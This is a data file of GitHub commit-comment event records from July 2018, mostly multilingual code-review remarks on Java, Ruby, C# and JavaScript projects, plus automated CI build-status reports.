{"id":"7990777692","type":"CommitCommentEvent","actor":{"login":"svnayden"},"repo":{"name":"svnayden/htsjdk"},"payload":{"comment":{"id":29768532,"position":16,"line":16,"path":"src/main/java/htsjdk/utils/convertorToDatabase/Read.java","commit_id":"73939ca9ce328a21196896fa750fd0334671d63e","created_at":"2018-07-19T18:08:47Z","updated_at":"2018-07-19T18:08:47Z","author_association":"OWNER","body":"Лучше @GeneratedValue(strategy = GenerationType.AUTO) и убрать @SequenceGenerator\r\nвсе это будет сгенерировано на старте на автомате"}},"created_at":"2018-07-19T18:08:47Z"}
{"id":"7990779972","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29768538,"position":10,"line":5,"path":"lesson1/tri_area.rb","commit_id":"d2bedcbd13df77e06f8e837a66a3a9961c7eb234","created_at":"2018-07-19T18:09:17Z","updated_at":"2018-07-19T18:09:17Z","author_association":"NONE","body":"Значение могут быть не целыми. Нужно использовать to_f, потому-что может выйти не правильный результат при делении\r\n```\r\n2.5.0 :002 > 3 / 2\r\n => 1\r\n2.5.0 :003 > 3.to_f / 2\r\n => 1.5\r\n2.5.0 :004 >\r\n```"}},"created_at":"2018-07-19T18:09:17Z"}
{"id":"7990781355","type":"CommitCommentEvent","actor":{"login":"svnayden"},"repo":{"name":"svnayden/htsjdk"},"payload":{"comment":{"id":29768541,"position":21,"line":21,"path":"src/main/java/htsjdk/utils/convertorToDatabase/Read.java","commit_id":"73939ca9ce328a21196896fa750fd0334671d63e","created_at":"2018-07-19T18:09:35Z","updated_at":"2018-07-19T18:09:35Z","author_association":"OWNER","body":"бессмысленная аннотация, по умолчанию значения могут быть null"}},"created_at":"2018-07-19T18:09:35Z"}
{"id":"7990783669","type":"CommitCommentEvent","actor":{"login":"svnayden"},"repo":{"name":"svnayden/htsjdk"},"payload":{"comment":{"id":29768547,"position":14,"line":14,"path":"src/main/java/htsjdk/utils/convertorToDatabase/ReadGroup.java","commit_id":"73939ca9ce328a21196896fa750fd0334671d63e","created_at":"2018-07-19T18:10:04Z","updated_at":"2018-07-19T18:10:04Z","author_association":"OWNER","body":"см. выше"}},"created_at":"2018-07-19T18:10:04Z"}
{"id":"7990785027","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29768549,"position":16,"line":14,"path":"lesson1/triangle.rb","commit_id":"d2bedcbd13df77e06f8e837a66a3a9961c7eb234","created_at":"2018-07-19T18:10:21Z","updated_at":"2018-07-19T18:10:21Z","author_association":"NONE","body":"С прошлой проверки\r\nпри этом оператор возведения в степень не рекомендуется выделять пробелами\r\n```\r\n    c**2   # хорошо\r\n    c ** 2 # плохо\r\n```"}},"created_at":"2018-07-19T18:10:21Z"}
{"id":"7990786386","type":"CommitCommentEvent","actor":{"login":"svnayden"},"repo":{"name":"svnayden/htsjdk"},"payload":{"comment":{"id":29768551,"position":40,"line":40,"path":"src/main/java/htsjdk/utils/convertorToDatabase/ReadGroup.java","commit_id":"73939ca9ce328a21196896fa750fd0334671d63e","created_at":"2018-07-19T18:10:38Z","updated_at":"2018-07-19T18:10:38Z","author_association":"OWNER","body":"я бы поставил FetchType lazy"}},"created_at":"2018-07-19T18:10:38Z"}
{"id":"7990791357","type":"CommitCommentEvent","actor":{"login":"svnayden"},"repo":{"name":"svnayden/htsjdk"},"payload":{"comment":{"id":29768559,"position":19,"line":19,"path":"src/main/java/htsjdk/utils/convertorToDatabase/Sequence.java","commit_id":"73939ca9ce328a21196896fa750fd0334671d63e","created_at":"2018-07-19T18:11:38Z","updated_at":"2018-07-19T18:11:38Z","author_association":"OWNER","body":"не работает"}},"created_at":"2018-07-19T18:11:38Z"}
{"id":"7990794993","type":"CommitCommentEvent","actor":{"login":"romgrk"},"repo":{"name":"Place1/node-gir"},"payload":{"comment":{"id":29768564,"position":null,"line":null,"path":null,"commit_id":"cb274c940382f6dc1a38797ed06a8ae2e8c6b373","created_at":"2018-07-19T18:12:21Z","updated_at":"2018-07-19T18:12:21Z","author_association":"NONE","body":"No thanks! I'm still working on node-gtk, but I do check on your project a lot for inspiration. I stalk your commits a lot for things that would be interesting to port to node-gtk :)"}},"created_at":"2018-07-19T18:12:21Z"}
{"id":"7990796591","type":"CommitCommentEvent","actor":{"login":"josevarghese"},"repo":{"name":"josevarghese/Progressive-Web-Apps-and-Service-Worker-Supported-Browsers"},"payload":{"comment":{"id":29768569,"position":null,"line":null,"path":null,"commit_id":"aa6144acf4dfab7a1bc12d6c94ccf4b45837ed66","created_at":"2018-07-19T18:12:40Z","updated_at":"2018-07-19T18:12:40Z","author_association":"OWNER","body":"revert"}},"created_at":"2018-07-19T18:12:40Z"}
{"id":"7990796667","type":"CommitCommentEvent","actor":{"login":"CornyjK"},"repo":{"name":"norgor/ModbusRTU"},"payload":{"comment":{"id":29768570,"position":null,"line":null,"path":null,"commit_id":"ed0b60ea5e452023ee70d07e1d0eff52ce902b57","created_at":"2018-07-19T18:12:41Z","updated_at":"2018-07-19T18:12:41Z","author_association":"CONTRIBUTOR","body":"If you want to keep email, you can put it in <> next to name."}},"created_at":"2018-07-19T18:12:41Z"}
{"id":"7990798028","type":"CommitCommentEvent","actor":{"login":"lawremi"},"repo":{"name":"Bioconductor/BiocWorkshops"},"payload":{"comment":{"id":29768576,"position":null,"line":null,"path":null,"commit_id":"83232692d8528bb60522731820c8ce17fd284e87","created_at":"2018-07-19T18:12:57Z","updated_at":"2018-07-19T18:12:57Z","author_association":"MEMBER","body":"I don't see anything about Rsamtools. I'll add it."}},"created_at":"2018-07-19T18:12:57Z"}
{"id":"7990800052","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"chmi3ll/agata-chmielewska-project"},"payload":{"comment":{"id":29768590,"position":13,"line":31,"path":"src/main/java/com/crud/tasks/scheduler/EmalScheduler.java","commit_id":"f8c42c8ad1670cb4fde0b47b4bc969209960b2cd","created_at":"2018-07-19T18:13:23Z","updated_at":"2018-07-19T18:13:23Z","author_association":"NONE","body":"Ten if nie jest potrzebny, dokładnie to samo jest w linii przed pierwszym ifem"}},"created_at":"2018-07-19T18:13:23Z"}
{"id":"7990804849","type":"CommitCommentEvent","actor":{"login":"Ryan229"},"repo":{"name":"jondavidjohn/payform"},"payload":{"comment":{"id":29768612,"position":null,"line":null,"path":null,"commit_id":"d70c4c666dbc56de3c3017f962b298627cbe1a1c","created_at":"2018-07-19T18:14:21Z","updated_at":"2018-07-19T18:14:21Z","author_association":"NONE","body":"var payform = require('payform');\n\n// Format input for card number entry\nvar input = document.getElementById('ccnum');\npayform.cardNumberInput(input)\n\n// Validate a credit card number\npayform.validateCardNumber('4242 4242 4242 4242'); //=> true\n\n// Get card type from number\npayform.parseCardType('4242 4242 4242 4242'); //=> 'visa'"}},"created_at":"2018-07-19T18:14:21Z"}
{"id":"7990805591","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"energy-plus/EnergyPlus"},"payload":{"comment":{"id":29768614,"position":null,"line":null,"path":null,"commit_id":"55777e3ff6b0484fcd23659b0a29262bd0e87d44","created_at":"2018-07-19T18:14:29Z","updated_at":"2018-07-19T18:14:29Z","author_association":"NONE","body":"CoilHackathonBranch1 (energy-plus) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: Tests Failed (764 of 2328 tests passed, 1 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 1\n * Failed: 627\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-55777e3ff6b0484fcd23659b0a29262bd0e87d44-PR6846-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-55777e3ff6b0484fcd23659b0a29262bd0e87d44-PR6846-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-32.82%25-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-55777e3ff6b0484fcd23659b0a29262bd0e87d44-PR6846-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-0.0%25-red.png)</a>\n"}},"created_at":"2018-07-19T18:14:29Z"}
{"id":"7990806171","type":"CommitCommentEvent","actor":{"login":"abhiv97"},"repo":{"name":"abhiv97/ProgrammingAssignment2"},"payload":{"comment":{"id":29768615,"position":null,"line":null,"path":null,"commit_id":"d460ddd20011b94e936a829712a0f25ea2547699","created_at":"2018-07-19T18:14:37Z","updated_at":"2018-07-19T18:14:37Z","author_association":"OWNER","body":"d460ddd20011b94e936a829712a0f25ea2547699"}},"created_at":"2018-07-19T18:14:37Z"}
{"id":"7990807229","type":"CommitCommentEvent","actor":{"login":"asmolin"},"repo":{"name":"yuzi-co/Forager"},"payload":{"comment":{"id":29768618,"position":null,"line":null,"path":null,"commit_id":"f1e7fee84c87aeb803cfcb13c66726aecbb7683a","created_at":"2018-07-19T18:14:50Z","updated_at":"2018-07-19T18:14:50Z","author_association":"NONE","body":"Сравнить получится только по алгоритму Lyra2z, т.к. этот алгоритм работает на обеих версиях. На первый взгляд 1.1 шустрее.\r\n[N-CcminerOur_HashRate.zip](https://github.com/yuzi-co/Forager/files/2211148/N-CcminerOur_HashRate.zip)\r\n\r\n\r\n"}},"created_at":"2018-07-19T18:14:50Z"}
{"id":"7990810938","type":"CommitCommentEvent","actor":{"login":"Octogonapus"},"repo":{"name":"purduesigbots/pros-docs"},"payload":{"comment":{"id":29768630,"position":5,"line":18,"path":"v5/okapi/tutorials/concepts/chassiscontroller.rst","commit_id":"58f6868c62363a396c7bef4b30ebd3142451db87","created_at":"2018-07-19T18:15:38Z","updated_at":"2018-07-19T18:15:38Z","author_association":"COLLABORATOR","body":"`closer-loop` should be `closed-loop`"}},"created_at":"2018-07-19T18:15:38Z"}
{"id":"7990812354","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"energy-plus/EnergyPlus"},"payload":{"comment":{"id":29768632,"position":null,"line":null,"path":null,"commit_id":"55777e3ff6b0484fcd23659b0a29262bd0e87d44","created_at":"2018-07-19T18:15:54Z","updated_at":"2018-07-19T18:15:54Z","author_association":"NONE","body":"CoilHackathonBranch1 (energy-plus) - x86_64-Linux-Ubuntu-14.04-custom_check: Build Failed\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-55777e3ff6b0484fcd23659b0a29262bd0e87d44-PR6846-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.png)</a>  \n"}},"created_at":"2018-07-19T18:15:54Z"}
{"id":"7990813996","type":"CommitCommentEvent","actor":{"login":"Octogonapus"},"repo":{"name":"purduesigbots/pros-docs"},"payload":{"comment":{"id":29768635,"position":5,"line":18,"path":"v5/okapi/tutorials/concepts/chassiscontroller.rst","commit_id":"58f6868c62363a396c7bef4b30ebd3142451db87","created_at":"2018-07-19T18:16:15Z","updated_at":"2018-07-19T18:16:15Z","author_association":"COLLABORATOR","body":"Also just as a note, I usually think of it the other way around `ChassisController` has all the open-loop functionality of `ChassisModel`, but I suppose this is fine as well."}},"created_at":"2018-07-19T18:16:15Z"}
{"id":"7990816694","type":"CommitCommentEvent","actor":{"login":"atherdon"},"repo":{"name":"GroceriStar/react-only-intern-23"},"payload":{"comment":{"id":29768644,"position":null,"line":null,"path":null,"commit_id":"bc02e81f9d5e2757ce4c092e386eb31f4e2f4a46","created_at":"2018-07-19T18:16:48Z","updated_at":"2018-07-19T18:16:48Z","author_association":"MEMBER","body":" please go to that repo and create an issue with label bug\n\n\nOn 19-Jul-2018 at 06:06 PM, Sanchit Sharma wrote:\n\n\nBut now I am getting error that data.getAllergies() is not a function. I\nthink the import of groceristar fetch is not working!\n\n—\nYou are receiving this because you authored the thread.\nReply to this email directly, view it on GitHub\n<https://github.com/GroceriStar/react-only-intern-23/commit/bc02e81f9d5e2757ce4c092e386eb31f4e2f4a46#commitcomment-29768499>,\nor mute the thread\n<https://github.com/notifications/unsubscribe-auth/ABZrDoMXFGPXCXG041OvgmH9GCDNMWsVks5uIMqZgaJpZM4VWk4P>\n.\n"}},"created_at":"2018-07-19T18:16:48Z"}
{"id":"7990817127","type":"CommitCommentEvent","actor":{"login":"jkotalik"},"repo":{"name":"aspnet/IISIntegration"},"payload":{"comment":{"id":29768646,"position":23,"line":23,"path":"test/IISExpress.FunctionalTests/InProcess/ConsoleRedirectionTests.cs","commit_id":"b86c2c96bb0b662a3c7b3d333254345cfa17f500","created_at":"2018-07-19T18:16:54Z","updated_at":"2018-07-19T18:16:54Z","author_association":"CONTRIBUTOR","body":"I check both Output and Error."}},"created_at":"2018-07-19T18:16:54Z"}
{"id":"7990820697","type":"CommitCommentEvent","actor":{"login":"pakrym"},"repo":{"name":"aspnet/IISIntegration"},"payload":{"comment":{"id":29768656,"position":23,"line":23,"path":"test/IISExpress.FunctionalTests/InProcess/ConsoleRedirectionTests.cs","commit_id":"b86c2c96bb0b662a3c7b3d333254345cfa17f500","created_at":"2018-07-19T18:17:39Z","updated_at":"2018-07-19T18:17:39Z","author_association":"CONTRIBUTOR","body":"Assert.Equals(\"falsefalse\"?"}},"created_at":"2018-07-19T18:17:39Z"}
{"id":"7990821695","type":"CommitCommentEvent","actor":{"login":"TriForceX"},"repo":{"name":"Asunaya/RefinedGunz"},"payload":{"comment":{"id":29768659,"position":null,"line":null,"path":null,"commit_id":"127dd28390c02bdb7935bde8fb55abe17ee9a6e9","created_at":"2018-07-19T18:17:53Z","updated_at":"2018-07-19T18:17:53Z","author_association":"NONE","body":"thanks for this! i was soon to comment this problem"}},"created_at":"2018-07-19T18:17:53Z"}
{"id":"7990821895","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29768660,"position":18,"line":16,"path":"lesson1/triangle.rb","commit_id":"d2bedcbd13df77e06f8e837a66a3a9961c7eb234","created_at":"2018-07-19T18:17:56Z","updated_at":"2018-07-19T18:17:56Z","author_association":"NONE","body":"Лучше избежать вложенного ифа. Сделать это можно скомбинировав условия через elsif. То есть тут мы хотим убедиться, что треугольник и прямоугольный и равнобедренный. И что-б не считать Пифагора два раза можно перенести вычисление Пифагора в отдельную переменную которая будет возвращать true/false и переиспользовать ее в сочитании с этим условием"}},"created_at":"2018-07-19T18:17:56Z"}
{"id":"7990823886","type":"CommitCommentEvent","actor":{"login":"svnayden"},"repo":{"name":"svnayden/htsjdk"},"payload":{"comment":{"id":29768664,"position":31,"line":31,"path":"src/main/java/htsjdk/utils/convertorToDatabase/ConvertorToDatabase.java","commit_id":"73939ca9ce328a21196896fa750fd0334671d63e","created_at":"2018-07-19T18:18:20Z","updated_at":"2018-07-19T18:18:20Z","author_association":"OWNER","body":"я бы назвал saveToDB или writeToDB"}},"created_at":"2018-07-19T18:18:20Z"}
{"id":"7990824107","type":"CommitCommentEvent","actor":{"login":"brendanposehn"},"repo":{"name":"jmiles9/revengeOfThe5th"},"payload":{"comment":{"id":29768665,"position":null,"line":null,"path":null,"commit_id":"1fd3af9804eaa2b57231bb28cdb467cf905f83b2","created_at":"2018-07-19T18:18:23Z","updated_at":"2018-07-19T18:18:23Z","author_association":"COLLABORATOR","body":"Added new servo definitions, verified on TINAH board and copying into mine"}},"created_at":"2018-07-19T18:18:23Z"}
{"id":"7990824802","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29768669,"position":18,"line":16,"path":"lesson1/triangle.rb","commit_id":"d2bedcbd13df77e06f8e837a66a3a9961c7eb234","created_at":"2018-07-19T18:18:33Z","updated_at":"2018-07-19T18:18:33Z","author_association":"NONE","body":"И кстати тут есть смысл сравнивать только катеты. Гипотенуза точно будет длинней"}},"created_at":"2018-07-19T18:18:33Z"}
{"id":"7990826923","type":"CommitCommentEvent","actor":{"login":"nchien2"},"repo":{"name":"juliacordero/turbo-barnacle"},"payload":{"comment":{"id":29768675,"position":null,"line":null,"path":null,"commit_id":"03555f4a7e07ff868b75412c0f800ec53a303a3d","created_at":"2018-07-19T18:18:59Z","updated_at":"2018-07-19T18:18:59Z","author_association":"COLLABORATOR","body":"I disagree"}},"created_at":"2018-07-19T18:18:59Z"}
{"id":"7990830282","type":"CommitCommentEvent","actor":{"login":"ningyuansg"},"repo":{"name":"source-academy/js-slang"},"payload":{"comment":{"id":29768683,"position":null,"line":null,"path":null,"commit_id":"5d457d503900661b98c17500d7546b0f24354b80","created_at":"2018-07-19T18:19:41Z","updated_at":"2018-07-19T18:19:41Z","author_association":"MEMBER","body":"@remo5000 Is the commit message auto-generated by npm's command for publishing? Is there a flag to make it less ugly"}},"created_at":"2018-07-19T18:19:41Z"}
{"id":"7990830900","type":"CommitCommentEvent","actor":{"login":"jkotalik"},"repo":{"name":"aspnet/IISIntegration"},"payload":{"comment":{"id":29768684,"position":23,"line":23,"path":"test/IISExpress.FunctionalTests/InProcess/ConsoleRedirectionTests.cs","commit_id":"b86c2c96bb0b662a3c7b3d333254345cfa17f500","created_at":"2018-07-19T18:19:49Z","updated_at":"2018-07-19T18:19:49Z","author_association":"CONTRIBUTOR","body":"_sigh_"}},"created_at":"2018-07-19T18:19:49Z"}
{"id":"7990834058","type":"CommitCommentEvent","actor":{"login":"d1vanov"},"repo":{"name":"robert7/quentier"},"payload":{"comment":{"id":29768691,"position":11,"line":11,"path":"src/dialogs/FirstShutdownDialog.cpp","commit_id":"86a9a89be66ee52a435cb565a08bbc14070cdfed","created_at":"2018-07-19T18:20:29Z","updated_at":"2018-07-19T18:20:29Z","author_association":"NONE","body":"Perhaps we could write something a bit more meaningful to the end user here, like \"Keep the app running or quit?\""}},"created_at":"2018-07-19T18:20:29Z"}
{"id":"7990836525","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29768694,"position":25,"line":23,"path":"lesson1/triangle.rb","commit_id":"d2bedcbd13df77e06f8e837a66a3a9961c7eb234","created_at":"2018-07-19T18:21:01Z","updated_at":"2018-07-19T18:21:01Z","author_association":"NONE","body":"Вот эту проверку можно было бы вытащить вообще выше и прерывать выполнение программы (например используя exit), если она вернет правду. Ведь, если это окажется правдой, то дальнейшие вычисления Пифагора бессмысленны."}},"created_at":"2018-07-19T18:21:01Z"}
{"id":"7990836559","type":"CommitCommentEvent","actor":{"login":"SevostyanovGerman"},"repo":{"name":"WebEducationPlatform/CRM"},"payload":{"comment":{"id":29768695,"position":56,"line":121,"path":"src/main/java/com/ewp/crm/service/youtube/ListLiveChatMessages.java","commit_id":"bdf1cbe7f653ca30e0d91e17a72b99b3236cf9f9","created_at":"2018-07-19T18:21:01Z","updated_at":"2018-07-19T18:21:01Z","author_association":"NONE","body":"обработать логгером"}},"created_at":"2018-07-19T18:21:01Z"}
{"id":"7990837303","type":"CommitCommentEvent","actor":{"login":"SevostyanovGerman"},"repo":{"name":"WebEducationPlatform/CRM"},"payload":{"comment":{"id":29768699,"position":86,"line":154,"path":"src/main/java/com/ewp/crm/service/youtube/ListLiveChatMessages.java","commit_id":"bdf1cbe7f653ca30e0d91e17a72b99b3236cf9f9","created_at":"2018-07-19T18:21:10Z","updated_at":"2018-07-19T18:21:10Z","author_association":"NONE","body":"втф?"}},"created_at":"2018-07-19T18:21:10Z"}
{"id":"7990840487","type":"CommitCommentEvent","actor":{"login":"pyrocto"},"repo":{"name":"rchain/rchain"},"payload":{"comment":{"id":29768707,"position":null,"line":null,"path":null,"commit_id":"b94339b5e6c3e755b932e48e5b62d2aa9152700c","created_at":"2018-07-19T18:21:48Z","updated_at":"2018-07-19T18:21:48Z","author_association":"COLLABORATOR","body":"It's the same as `for (@{x+3} <- z) { ... }`.  It's legal, just won't ever match."}},"created_at":"2018-07-19T18:21:48Z"}
{"id":"7990842398","type":"CommitCommentEvent","actor":{"login":"elfring"},"repo":{"name":"dchapyshev/aspia"},"payload":{"comment":{"id":29768709,"position":null,"line":null,"path":null,"commit_id":"8e6ba39875440c40877b115dc8586020925ca0b7","created_at":"2018-07-19T18:22:11Z","updated_at":"2018-07-19T18:22:11Z","author_association":"NONE","body":"Unfortunately, this source code adjustment is incomplete for standard compliance.\r\nI suggest to [reconsider also the usage of double underscores in such identifiers](https://stackoverflow.com/questions/228783/what-are-the-rules-about-using-an-underscore-in-a-c-identifier#answer-228797 \"What are the rules about using an underscore in a C++ identifier?\")."}},"created_at":"2018-07-19T18:22:11Z"}
{"id":"7990843762","type":"CommitCommentEvent","actor":{"login":"jpeterson88"},"repo":{"name":"ayovev/retirement-tracking-app"},"payload":{"comment":{"id":29768711,"position":3,"line":3,"path":"client/src/App.js","commit_id":"efb1b0b9425eb053d62d95af2b164701fcb9b002","created_at":"2018-07-19T18:22:27Z","updated_at":"2018-07-19T18:22:27Z","author_association":"COLLABORATOR","body":"Being consistent in casing is important for readability. If we change the \"table\" folder from lowercase to upper, then we should change all of the folders. Considering most professional apps use lowercase hyphenated the majority of our app already uses it, I used lower case for table. "}},"created_at":"2018-07-19T18:22:27Z"}
{"id":"7990848695","type":"CommitCommentEvent","actor":{"login":"nouaryk"},"repo":{"name":"nouaryk/Drupal7-f1-modules-themes"},"payload":{"comment":{"id":29768724,"position":null,"line":null,"path":null,"commit_id":"1fbf8571a91e263718fa418ec6ec4972d55d9388","created_at":"2018-07-19T18:23:28Z","updated_at":"2018-07-19T18:23:28Z","author_association":"OWNER","body":"+ Minor css changes"}},"created_at":"2018-07-19T18:23:28Z"}
{"id":"7990850656","type":"CommitCommentEvent","actor":{"login":"kjain14"},"repo":{"name":"kjain14/TestRepository"},"payload":{"comment":{"id":29768729,"position":null,"line":null,"path":null,"commit_id":"6c3b36e8ecf058ceebe6a04d9be964c32a188ef5","created_at":"2018-07-19T18:23:52Z","updated_at":"2018-07-19T18:23:52Z","author_association":"OWNER","body":"AN-5"}},"created_at":"2018-07-19T18:23:52Z"}
{"id":"7990851482","type":"CommitCommentEvent","actor":{"login":"d1vanov"},"repo":{"name":"robert7/quentier"},"payload":{"comment":{"id":29768730,"position":28,"line":3798,"path":"src/MainWindow.cpp","commit_id":"f70acaf9614dbe5e7e1bc86af105128f7b312446","created_at":"2018-07-19T18:24:02Z","updated_at":"2018-07-19T18:24:02Z","author_association":"NONE","body":"Could you please surround `pDialog->exec() == QDialog::Accepted` with braces? Pleeease :pray: I know they are syntactically redundant but it makes reading a little bit easier, to me at least."}},"created_at":"2018-07-19T18:24:02Z"}
{"id":"7990854389","type":"CommitCommentEvent","actor":{"login":"yoliMunozS"},"repo":{"name":"yoliMunozS/blog"},"payload":{"comment":{"id":29768735,"position":null,"line":null,"path":null,"commit_id":"d59a21bcac8de143d08dc31d9b7d8b542227ff2c","created_at":"2018-07-19T18:24:39Z","updated_at":"2018-07-19T18:24:39Z","author_association":"OWNER","body":"# [Aprendiendo JavaScript con MentoringJS - Pretrainig Step 2](http://mentoringjs.com/)\r\n## Empezando con Git\r\n### ¿Qué es git?\r\n\r\nGit es un software de control de versiones libre y de código abierto diseñado para tratar cualquier proyecto, sea pequeño o grande, con velocidad y eficiencia. \r\n\r\nLos primeros pasos a seguir es la descarga e instalación del programa **Git** desde su [página oficial](https://git-scm.com/).\r\n"}},"created_at":"2018-07-19T18:24:39Z"}
{"id":"7990856514","type":"CommitCommentEvent","actor":{"login":"Bladealex"},"repo":{"name":"Bladealex/HelloMundo"},"payload":{"comment":{"id":29768741,"position":null,"line":null,"path":null,"commit_id":"51f71ae20c40ba981d1a5985f0cf35f5bab90586","created_at":"2018-07-19T18:25:05Z","updated_at":"2018-07-19T18:25:05Z","author_association":"OWNER","body":"sa"}},"created_at":"2018-07-19T18:25:05Z"}
{"id":"7990857969","type":"CommitCommentEvent","actor":{"login":"brandonkal"},"repo":{"name":"ryanwiemer/gatsby-starter-gcn"},"payload":{"comment":{"id":29768744,"position":null,"line":null,"path":null,"commit_id":"7f22027945022d4a629c17f2354b75312ea02cad","created_at":"2018-07-19T18:25:22Z","updated_at":"2018-07-19T18:25:22Z","author_association":"CONTRIBUTOR","body":"That is true but this repo is specifically meant as a starter. A lock file need not exist until after the project has been created from this starter.  I suppose they could be included but that would mean users would receive older packages without someone constantly maintaining the lock files. It would also get messy if PRs contained lock files. I made this'll commit to match the original exclusion of package-lock.json but I am open to removing the ignores."}},"created_at":"2018-07-19T18:25:22Z"}
{"id":"7990863975","type":"CommitCommentEvent","actor":{"login":"trojanc"},"repo":{"name":"OpenCollabZA/payment-simulator"},"payload":{"comment":{"id":29768754,"position":null,"line":null,"path":null,"commit_id":"588582ac34e8f55b17b4e213a170c40816ce0479","created_at":"2018-07-19T18:26:32Z","updated_at":"2018-07-19T18:26:32Z","author_association":"MEMBER","body":"Sorry I had to delete his document. It may not legally be shared."}},"created_at":"2018-07-19T18:26:32Z"}
{"id":"7990868052","type":"CommitCommentEvent","actor":{"login":"kKdH"},"repo":{"name":"logbee/keyscore"},"payload":{"comment":{"id":29768760,"position":null,"line":null,"path":null,"commit_id":"71be9b6e4570ef06f29459ad38ca5c126d02c438","created_at":"2018-07-19T18:27:22Z","updated_at":"2018-07-19T18:27:22Z","author_association":"CONTRIBUTOR","body":"I'm curious about the 'real' implementation of these filter logics. "}},"created_at":"2018-07-19T18:27:22Z"}
{"id":"7990877139","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29768783,"position":null,"line":null,"path":null,"commit_id":"dc94abb2fe56f0e9b17982844fd05c5a37f2ddcb","created_at":"2018-07-19T18:29:13Z","updated_at":"2018-07-19T18:29:13Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/dc94abb2fe56f0e9b17982844fd05c5a37f2ddcb/index.html"}},"created_at":"2018-07-19T18:29:13Z"}
{"id":"7990886689","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29768795,"position":null,"line":null,"path":null,"commit_id":"ca699662bd5cde5c626a32e8937455b6071a9077","created_at":"2018-07-19T18:31:10Z","updated_at":"2018-07-19T18:31:10Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/ca699662bd5cde5c626a32e8937455b6071a9077/index.html"}},"created_at":"2018-07-19T18:31:10Z"}
{"id":"7990887962","type":"CommitCommentEvent","actor":{"login":"yang1070"},"repo":{"name":"smartdevicelink/sdl_hmi_integration_guidelines"},"payload":{"comment":{"id":29768804,"position":null,"line":null,"path":null,"commit_id":"6aae16fbf4b0a12ef2088457607918544509ccf3","created_at":"2018-07-19T18:31:24Z","updated_at":"2018-07-19T18:31:24Z","author_association":"NONE","body":"@LitvinenkoIra There is a block says \"App1 can be activated\" after RC get enabled. Does that duplicate the previous block about app1 can be activated when RC is disabled?"}},"created_at":"2018-07-19T18:31:24Z"}
{"id":"7990889121","type":"CommitCommentEvent","actor":{"login":"LiNk-NY"},"repo":{"name":"Bioconductor/BiocWorkshops"},"payload":{"comment":{"id":29768810,"position":null,"line":null,"path":null,"commit_id":"f29aa79fb1f81fc0b5285cf920a67ac5f7d5f342","created_at":"2018-07-19T18:31:37Z","updated_at":"2018-07-19T18:31:37Z","author_association":"COLLABORATOR","body":"I'm not sure how this will interact with `_common.R` "}},"created_at":"2018-07-19T18:31:37Z"}
{"id":"7990891000","type":"CommitCommentEvent","actor":{"login":"pakrym"},"repo":{"name":"aspnet/IISIntegration"},"payload":{"comment":{"id":29768815,"position":23,"line":23,"path":"test/IISExpress.FunctionalTests/InProcess/ConsoleRedirectionTests.cs","commit_id":"b86c2c96bb0b662a3c7b3d333254345cfa17f500","created_at":"2018-07-19T18:32:00Z","updated_at":"2018-07-19T18:32:00Z","author_association":"CONTRIBUTOR","body":"or `await context.Response.WriteAsync($\"{Console.IsOutputRedirected | Console.IsErrorRedirected}\");`"}},"created_at":"2018-07-19T18:32:00Z"}
{"id":"7990891394","type":"CommitCommentEvent","actor":{"login":"cw75"},"repo":{"name":"cw75/tiered-storage"},"payload":{"comment":{"id":29768816,"position":16,"line":68,"path":"CMakeLists.txt","commit_id":"307475c259b153248ccd85e388a0c5ef0b23f5d6","created_at":"2018-07-19T18:32:05Z","updated_at":"2018-07-19T18:32:05Z","author_association":"OWNER","body":"when we include this thing, does it run anything?"}},"created_at":"2018-07-19T18:32:05Z"}
{"id":"7990899879","type":"CommitCommentEvent","actor":{"login":"SevostyanovGerman"},"repo":{"name":"WebEducationPlatform/CRM"},"payload":{"comment":{"id":29768829,"position":86,"line":154,"path":"src/main/java/com/ewp/crm/service/youtube/ListLiveChatMessages.java","commit_id":"bdf1cbe7f653ca30e0d91e17a72b99b3236cf9f9","created_at":"2018-07-19T18:33:51Z","updated_at":"2018-07-19T18:33:51Z","author_association":"NONE","body":"добавь коммент над этим методом с ссылкой на SO"}},"created_at":"2018-07-19T18:33:51Z"}
